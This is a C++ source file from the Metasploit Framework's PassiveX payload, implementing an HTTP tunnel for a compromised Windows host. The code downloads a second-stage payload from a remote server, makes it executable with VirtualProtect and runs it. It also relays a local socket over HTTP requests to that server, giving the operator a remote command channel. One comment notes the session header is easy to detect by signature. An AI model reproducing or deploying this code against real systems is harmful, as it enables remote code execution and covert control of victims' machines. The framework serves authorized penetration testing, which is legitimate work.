metasploit-framework/external/source/passivex/HttpTunnel.cpp

839 lines
17 KiB
C++
Raw Normal View History

/*
* This file is part of the Metasploit Exploit Framework
* and is subject to the same licenses and copyrights as
* the rest of this package.
*/
#include "PassiveXLib.h"
#include "HttpTunnel.h"
// The number of failed HTTP connections
static DWORD FailedConnections = 0;
HttpTunnel::HttpTunnel()
: HttpHost(NULL),
HttpUriBase(NULL),
HttpSid(NULL),
HttpPort(0),
LocalTcpListener(0),
LocalTcpClientSide(0),
LocalTcpServerSide(0),
InternetHandle(NULL),
SendThread(NULL),
ReceiveThread(NULL),
SecondStageThread(NULL),
SecondStage(NULL),
SecondStageSize(0)
{
// Initialize winsock, not that we should need to.
WSAStartup(
MAKEWORD(2, 2),
&WsaData);
srand((unsigned int)time(NULL));
}
HttpTunnel::~HttpTunnel()
{
Stop();
// Cleanup winsock
WSACleanup();
}
/*
* Initiates the HTTP tunnel and gets the ball rolling
*/
DWORD HttpTunnel::Start(
IN LPSTR InHttpHost,
IN LPSTR InHttpUriBase,
IN LPSTR InHttpSid,
IN USHORT InHttpPort)
{
DWORD ThreadId;
DWORD Result = ERROR_SUCCESS;
do
{
// Initialize the hostname and port
if (!(HttpHost = _strdup(InHttpHost)))
{
Result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
if ((InHttpSid) &&
(InHttpSid[0]) &&
(!(HttpSid = _strdup(InHttpSid))))
{
Result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
if ((InHttpUriBase) &&
(InHttpUriBase[0]) &&
(!(HttpUriBase = _strdup(InHttpUriBase))))
{
Result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Eliminate any trailing slashes as to prevent potential problems. If
// HttpUriBase is just "/", then it'll become virtuall unused.
if ((HttpUriBase) &&
(HttpUriBase[strlen(HttpUriBase) - 1] == '/'))
HttpUriBase[strlen(HttpUriBase) - 1] = 0;
HttpPort = InHttpPort;
// Acquire the internet context handle
if (!(InternetHandle = InternetOpen(
NULL,
INTERNET_OPEN_TYPE_PRECONFIG,
NULL,
NULL,
0)))
{
Result = GetLastError();
break;
}
// Create the local TCP abstraction
if ((Result = InitializeLocalConnection()) != ERROR_SUCCESS)
{
CPassiveX::Log(
TEXT("Start(): InitializeLocalConnection failed, %lu.\n"),
Result);
break;
}
// Download the second stage if there is one
DownloadSecondStage();
// Create the transmission thread
if (!(SendThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)SendThreadFuncSt,
this,
0,
&ThreadId)))
{
Result = GetLastError();
break;
}
// Create the receive thread
if (!(ReceiveThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)ReceiveThreadFuncSt,
this,
0,
&ThreadId)))
{
Result = GetLastError();
break;
}
// Woop
Result = ERROR_SUCCESS;
} while (0);
return Result;
}
/*
* Stops the HTTP tunnel and cleans up resources
*/
DWORD HttpTunnel::Stop()
{
DWORD Result = ERROR_SUCCESS;
DWORD Index = 0;
LPHANDLE Threads[] =
{
&SecondStageThread,
&ReceiveThread,
&SendThread,
NULL
};
// Terminate the threads that were spawned
for (Index = 0;
Threads[Index];
Index++)
{
LPHANDLE Thread = Threads[Index];
if (*Thread)
{
TerminateThread(
*Thread,
0);
CloseHandle(
*Thread);
*Thread = NULL;
}
}
// Close all of the open sockets we may have
if (LocalTcpListener)
closesocket(
LocalTcpListener);
if (LocalTcpClientSide)
closesocket(
LocalTcpClientSide);
if (LocalTcpServerSide)
closesocket(
LocalTcpServerSide);
LocalTcpListener = 0;
LocalTcpClientSide = 0;
LocalTcpServerSide = 0;
// Free up memory associated with the second stage
if (SecondStage)
{
free(
SecondStage);
SecondStage = NULL;
SecondStageSize = 0;
}
// Close the global internet handle acquired from InternetOpen
if (InternetHandle)
{
InternetCloseHandle(
InternetHandle);
InternetHandle = NULL;
}
return Result;
}
/*********************
* Protected Methods *
*********************/
/*
* Creates the local TCP abstraction that will be used as the socket for the
* second stage that is read in
*/
typedef SOCKET (WINAPI * WSASOCKETA)( int, int, int, LPVOID, DWORD, DWORD );
DWORD HttpTunnel::InitializeLocalConnection()
{
struct sockaddr_in Sin;
USHORT LocalPort = 0;
DWORD Attempts = 0;
DWORD Result = ERROR_SUCCESS;
HMODULE hWinsock = NULL;
WSASOCKETA pWSASocketA = NULL;
WSADATA wsaData;
hWinsock = LoadLibraryA( "WS2_32.DLL" );
if( hWinsock == NULL )
{
CPassiveX::Log( TEXT("DownloadSecondStage(): LoadLibraryA for WS2_32.DLL failed.\n") );
return !ERROR_SUCCESS;
}
pWSASocketA = (WSASOCKETA)GetProcAddress( hWinsock, "WSASocketA");
if( pWSASocketA == NULL )
{
CPassiveX::Log( TEXT("DownloadSecondStage(): GetProcAddress for WSASocketA failed.\n") );
return !ERROR_SUCCESS;
}
if( WSAStartup( MAKEWORD(2,2), &wsaData ) != 0 )
{
CPassiveX::Log( TEXT("DownloadSecondStage(): WSAStartup failed.\n") );
return !ERROR_SUCCESS;
}
do
{
// Create the TCP listener socket
//LocalTcpListener = pWSASocketA( AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0 ,0 );
LocalTcpListener = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if( LocalTcpListener == INVALID_SOCKET )
{
LocalTcpListener = 0;
Result = WSAGetLastError();
break;
}
// Create the TCP client socket
LocalTcpClientSide = pWSASocketA( AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0 ,0 );
if( LocalTcpClientSide == INVALID_SOCKET )
{
LocalTcpClientSide = 0;
Result = WSAGetLastError();
break;
}
Sin.sin_family = AF_INET;
Sin.sin_addr.s_addr = inet_addr("127.0.0.1");
// Try 256 times to pick a random port
Sin.sin_port = htons(LocalPort = (rand() % 32000) + 1025);
while( ( bind( LocalTcpListener, (struct sockaddr *)&Sin, sizeof(Sin) ) == SOCKET_ERROR ) && (Attempts++ < 256) )
{
Sin.sin_port = htons(LocalPort = (rand() % 32000) + 1025);
}
// If we failed to create the local listener, bomb out
if (Attempts >= 256)
{
Result = WSAGetLastError();
break;
}
// Listen and stuff
if (listen( LocalTcpListener, 1) == SOCKET_ERROR)
{
Result = WSAGetLastError();
break;
}
// Establish a connection to the local listener
if (connect( LocalTcpClientSide, (struct sockaddr *)&Sin, sizeof(Sin)) == SOCKET_ERROR)
{
Result = WSAGetLastError();
break;
}
// Accept the local TCP connection
if ((LocalTcpServerSide = accept( LocalTcpListener, NULL, NULL)) == SOCKET_ERROR)
{
LocalTcpServerSide = 0;
Result = WSAGetLastError();
break;
}
// Woop!
Result = ERROR_SUCCESS;
} while (0);
return Result;
}
/*
* Downloads the second stage payload from the remote HTTP host and executes it
* in its own thread if there is one
*/
VOID HttpTunnel::DownloadSecondStage()
{
DWORD dwOldProtect = 0;
// Transmit the request to download the second stage. The stage buffer that
// is passed back is never deallocated.
if ((TransmitHttpRequest(
TEXT("GET"),
PASSIVEX_URI_SECOND_STAGE,
NULL,
0,
30000,
NULL,
(PVOID *)&SecondStage,
&SecondStageSize) == ERROR_SUCCESS) &&
(SecondStageSize))
{
DWORD ThreadId = 0;
CPassiveX::Log( TEXT("DownloadSecondStage(): Downloaded %lu byte second stage, executing it...\n"), SecondStageSize);
if( !VirtualProtect( (LPVOID)SecondStage, SecondStageSize, PAGE_EXECUTE_READWRITE, &dwOldProtect ) )
{
CPassiveX::Log(
TEXT("DownloadSecondStage(): Failed to VirtualProtect second stage (0x%08X) to be RWX. Error %lu."),
SecondStageSize, GetLastError() );
}
// Create the second stage thread
SecondStageThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)SecondStageThreadFuncSt,
this,
0,
&ThreadId);
}
else
{
CPassiveX::Log(
TEXT("DownloadSecondStage(): Failed to download second stage, %lu."),
GetLastError());
ExitProcess(0);
}
}
/*
* Transmits the supplied data to the remote HTTP host
*/
DWORD HttpTunnel::TransmitToRemote(
IN PUCHAR Buffer,
IN ULONG BufferSize)
{
CPassiveX::Log(
TEXT("TransmitToRemote(): Transmitting %lu bytes of data to the remote side of the TCP abstraction.\n"),
BufferSize);
return TransmitHttpRequest(
"POST",
PASSIVEX_URI_TUNNEL_IN,
Buffer,
BufferSize);
}
/*
* Transmits the supplied data to the server side of the local TCP abstraction
*/
DWORD HttpTunnel::TransmitToLocal(
IN PUCHAR Buffer,
IN ULONG BufferSize)
{
DWORD Result = ERROR_SUCCESS;
INT BytesWritten = 0;
// Keep writing until everything has been written
while (BufferSize > 0)
{
CPassiveX::Log(
TEXT("TransmitToLocal(): Transmitting %lu bytes of data to the local side of the TCP abstraction.\n"),
BufferSize);
if ((BytesWritten = send(
LocalTcpServerSide,
(const char *)Buffer,
BufferSize,
0)) == SOCKET_ERROR)
{
Result = WSAGetLastError();
break;
}
Buffer += BytesWritten;
BufferSize -= BytesWritten;
}
return Result;
}
/*
* Transmits an HTTP request to the target host, optionally waiting for a
* response
*/
DWORD HttpTunnel::TransmitHttpRequest(
IN LPTSTR Method,
IN LPTSTR Uri,
IN PVOID RequestPayload,
IN ULONG RequestPayloadLength,
IN ULONG WaitResponseTimeout,
OUT LPDWORD ResponseCode,
OUT PVOID *ResponsePayload,
OUT LPDWORD ResponsePayloadLength)
{
HINTERNET RequestHandle = NULL;
HINTERNET ConnectHandle = NULL;
PUCHAR OutBuffer = NULL;
DWORD OutBufferLength = 0;
UCHAR ReadBuffer[8192];
DWORD ReadBufferLength;
DWORD Result = ERROR_SUCCESS;
PCHAR AdditionalHeaders = NULL;
CHAR FullUri[1024];
// Construct the full URI
if (HttpUriBase && HttpUriBase[0])
sprintf_s(FullUri, sizeof(FullUri) - 1, "%s%s", HttpUriBase, Uri);
else
strncpy_s(FullUri, 1024, Uri, sizeof(FullUri) - 1);
FullUri[sizeof(FullUri) - 1] = 0;
do
{
PROFILE_CHECKPOINT("InternetConnect ==>");
// Open a connection handle
if (!(ConnectHandle = InternetConnect(
InternetHandle,
HttpHost,
HttpPort,
NULL,
NULL,
INTERNET_SERVICE_HTTP,
0,
NULL)))
{
Result = GetLastError();
break;
}
PROFILE_CHECKPOINT("InternetConnect <==");
// If we were supplied a wait response timeout, set it
if (WaitResponseTimeout)
InternetSetOption(
ConnectHandle,
INTERNET_OPTION_RECEIVE_TIMEOUT,
&WaitResponseTimeout,
sizeof(WaitResponseTimeout));
PROFILE_CHECKPOINT("HttpOpenRequest ==>");
// Open a request handle
if (!(RequestHandle = HttpOpenRequest(
ConnectHandle,
Method ? Method : TEXT("GET"),
FullUri,
NULL,
NULL,
NULL,
INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE |
INTERNET_FLAG_RELOAD,
NULL)))
{
Result = GetLastError();
break;
}
// If we were assigned an HTTP session identifier, then allocate an
// additional header for transmission to the remote side.
if (HttpSid)
{
size_t size = strlen(HttpSid) + 32;
// Yeah, I'm lame, this is easy to sig. Improve me if you care!
if(( AdditionalHeaders = (PCHAR)malloc(size) ))
sprintf_s( AdditionalHeaders, size, "X-Sid: sid=%s\r\n", HttpSid );
}
PROFILE_CHECKPOINT("HttpOpenRequest <==");
PROFILE_CHECKPOINT("HttpSendRequest ==>");
// Send and endthe request
if ((!HttpSendRequest(
RequestHandle,
AdditionalHeaders,
(AdditionalHeaders) ? -1L : 0,
RequestPayload,
RequestPayloadLength)))
{
Result = GetLastError();
break;
}
PROFILE_CHECKPOINT("HttpSendRequest <==");
// If we wont be waiting for a response, break out now and return
if (!WaitResponseTimeout)
{
Result = ERROR_SUCCESS;
break;
}
// Keep looping until we've read the entire request or an error is
// encountered
while (1)
{
PUCHAR NewBuffer;
ReadBufferLength = sizeof(ReadBuffer);
PROFILE_CHECKPOINT("InternetReadFile ==>");
if (!InternetReadFile(
RequestHandle,
ReadBuffer,
ReadBufferLength,
&ReadBufferLength))
{
Result = GetLastError();
break;
}
else if (!ReadBufferLength)
{
Result = ERROR_SUCCESS;
break;
}
PROFILE_CHECKPOINT("InternetReadFile <==");
// Append the buffer to the output buffer
if (!OutBuffer)
NewBuffer = (PUCHAR)malloc(
ReadBufferLength);
else
NewBuffer = (PUCHAR)realloc(
OutBuffer,
OutBufferLength + ReadBufferLength);
if (!NewBuffer)
{
Result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
memcpy(
NewBuffer + OutBufferLength,
ReadBuffer,
ReadBufferLength);
OutBuffer = NewBuffer;
OutBufferLength += ReadBufferLength;
}
// Query the status code of the response
if (ResponseCode)
{
DWORD ResponseCodeSize = sizeof(DWORD);
if (!HttpQueryInfo(
RequestHandle,
HTTP_QUERY_STATUS_CODE,
ResponseCode,
&ResponseCodeSize,
NULL))
{
CPassiveX::Log(
TEXT("HttpQueryInfo failed, %lu."),
GetLastError());
*ResponseCode = 0;
}
}
} while (0);
PROFILE_CHECKPOINT("Finished TransmitHttpRequest");
// Close handles
if (RequestHandle)
InternetCloseHandle(
RequestHandle);
if (ConnectHandle)
InternetCloseHandle(
ConnectHandle);
if (AdditionalHeaders)
free(AdditionalHeaders);
// Set the output pointers or free up the output buffer
if (Result == ERROR_SUCCESS)
{
if (ResponsePayload)
*ResponsePayload = OutBuffer;
if (ResponsePayloadLength)
*ResponsePayloadLength = OutBufferLength;
FailedConnections = 0;
}
else
{
// If we fail to connect...
if (Result == ERROR_INTERNET_CANNOT_CONNECT)
{
FailedConnections++;
if (FailedConnections > 10)
{
CPassiveX::Log("TransmitHttpRequest(): Failed to connect to HTTP server (%lu), exiting.",
FailedConnections);
ExitProcess(0);
}
}
if (OutBuffer)
free(
OutBuffer);
}
return Result;
}
/*
* Method wrapper
*/
ULONG HttpTunnel::SendThreadFuncSt(
IN HttpTunnel *Tunnel)
{
return Tunnel->SendThreadFunc();
}
/*
* Monitors the server side of the local TCP abstraction for data that can be
* transmitted to the remote half of the pipe
*/
ULONG HttpTunnel::SendThreadFunc()
{
fd_set FdSet;
UCHAR ReadBuffer[16384];
LONG BytesRead;
INT Result;
// This is the song that never ends...
while (1)
{
FD_ZERO(
&FdSet);
FD_SET(
LocalTcpServerSide,
&FdSet);
PROFILE_CHECKPOINT("select ==>");
// Wait for some data...
Result = select(
LocalTcpServerSide + 1,
&FdSet,
NULL,
NULL,
NULL);
PROFILE_CHECKPOINT("select <==");
// If select failed or there was no new data, act accordingly else risk
// the fist of the evil witch
if (Result < 0)
{
CPassiveX::Log(
TEXT("SendThreadFunc(): TUNNEL_IN: Select failed, %lu.\n"),
WSAGetLastError());
break;
}
else if (Result == 0)
continue;
PROFILE_CHECKPOINT("recv ==>");
// Read in data from the local server side of the TCP connection
BytesRead = recv(
LocalTcpServerSide,
(char *)ReadBuffer,
sizeof(ReadBuffer),
0);
PROFILE_CHECKPOINT("recv <==");
// On error or end of file...
if (BytesRead <= 0)
{
CPassiveX::Log(
TEXT("SendThreadFunc(): TUNNEL_IN: Read 0 or fewer bytes, erroring out (%lu).\n"),
BytesRead);
break;
}
CPassiveX::Log(
TEXT("SendThreadFunc(): TUNNEL_IN: Transmitting %lu bytes of data to remote side.\n"),
BytesRead);
PROFILE_CHECKPOINT("TransmitToRemote ==>");
// Transmit the data to the remote side
if ((Result = TransmitToRemote(
ReadBuffer,
BytesRead)) != ERROR_SUCCESS)
{
CPassiveX::Log(
TEXT("SendThreadFunc(): TUNNEL_IN: TransmitToRemote failed, %lu.\n"),
Result);
}
PROFILE_CHECKPOINT("TransmitToRemote <==");
}
// Exit the process if the send thread ends
ExitProcess(0);
return 0;
}
/*
* Method wrapper
*/
ULONG HttpTunnel::ReceiveThreadFuncSt(
IN HttpTunnel *Tunnel)
{
return Tunnel->ReceiveThreadFunc();
}
/*
* Polls for data that should be sent to the local server side of the TCP
* abstraction
*/
ULONG HttpTunnel::ReceiveThreadFunc()
{
PUCHAR ReadBuffer = NULL;
DWORD ReadBufferLength = 0;
DWORD ResponseCode = 0;
while (1)
{
ReadBufferLength = 0;
ReadBuffer = NULL;
ResponseCode = 0;
if ((TransmitHttpRequest(
TEXT("GET"),
PASSIVEX_URI_TUNNEL_OUT,
NULL,
0,
30000,
&ResponseCode,
(PVOID *)&ReadBuffer,
&ReadBufferLength) == ERROR_SUCCESS) &&
(ReadBuffer))
{
CPassiveX::Log(
TEXT("ReceiveThreadFunc(): TUNNEL_OUT: Received response code %lu, buffer length %lu.\n"),
ResponseCode,
ReadBufferLength);
TransmitToLocal(
ReadBuffer,
ReadBufferLength);
free(
ReadBuffer);
}
else
{
CPassiveX::Log(
TEXT("ReceiveThreadFunc(): TUNNEL_OUT: TransmitHttpRequest failed, %lu.\n"),
GetLastError());
}
}
return 0;
}
/*
* Calls the second stage after initializing the proper registers
*/
ULONG HttpTunnel::SecondStageThreadFuncSt(
IN HttpTunnel *Tunnel)
{
SOCKET Fd = Tunnel->LocalTcpClientSide;
// Initialize edi to the file descriptor that the second stage might use
__asm
{
lea eax, [Fd]
mov edi, [eax]
}
((VOID (*)())Tunnel->SecondStage)();
return 0;
}